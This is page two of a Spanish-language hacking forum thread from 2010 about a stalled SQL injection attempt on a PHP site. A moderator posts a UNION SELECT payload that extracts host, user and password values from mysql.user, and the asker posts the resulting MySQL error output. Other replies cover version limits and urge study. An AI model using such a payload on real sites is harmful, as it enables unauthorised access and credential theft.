elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Casi es Mio SQL inyection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Casi es Mio SQL inyection  (Leído 6,074 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #10 en: 23 Marzo 2010, 00:11 am »
Intentad así:
Código
  1. id=-1+UNION+ALL+SELECT+1,group_concat(host,0x3a,USER,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.USER--
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #11 en: 23 Marzo 2010, 00:20 am »
gracias, pero me da el mismo error, no lo termino de entender!!!
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #12 en: 23 Marzo 2010, 00:39 am »
Que error?
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #13 en: 23 Marzo 2010, 00:45 am »
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php  on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #14 en: 23 Marzo 2010, 02:26 am »
mmm ya sé cual es él problema... Mira lo que pasa esque la version de MySQL debe ser >= 5 para que tenga information_schema de lo contrario no podras usarlo.
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #15 en: 23 Marzo 2010, 06:10 am »
primero aprende lenguaje sql en mysql y php, despues intenta buscar vulnerabilidades.

http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html
En línea
- https://yhojann.cl/ - https://whk.cl/
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #16 en: 23 Marzo 2010, 09:44 am »
saludos desde el año 1999 que programa con php y mysql, pero bueno siempre se puede estudiar mas  :rolleyes:
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines